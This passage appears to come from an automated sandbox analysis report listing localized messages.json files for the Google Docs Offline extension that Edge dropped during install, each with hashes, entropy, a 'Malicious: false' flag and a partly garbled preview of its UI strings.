Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.631887382471946
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97f9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95MwP9KkJ+je:YwBrD2J2DBLMfFuWvdpY94vioO+uh
MD5:	1F565FB1C549B18AF8BBFED8DECD5D94
SHA1:	B57F4BDAE06FF3DFC1EB3E56B6F2F204D6F63638
SHA-256:	E16325D1A641EF7421F2BAFCD6433D53543C89D498DD96419B03CBA60B9C7D60
SHA-512:	A60B8E042A9BCDCC136B87948E9924A0B24D67C6CA9803904B876F162A0AD82B9619F1316BE9FF107DD143B44F7E6F5DF604ABFE00818DEB40A7D62917CDA69F
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1880
Entropy (8bit):	4.295185867329351
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/UGG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZZ
MD5:	8E16966E815C3C274EEB8492B1EA6648
SHA1:	7482ED9F1C9FD9F6F9BA91AB15921B19F64C9687
SHA-256:	418FF53FCA505D54268413C796E4DF80E947A09F399AB222A90B81E93113D5B5
SHA-512:	85B28202E874B1CF45B37BA05B87B3D8D6FE38E89C6011C4240CF6B563EA6DA60181D712CCE20D07C364F4A266A4EC90C4934CC8B7BB2013CB3B22D755796E38
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2628_1179938286\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
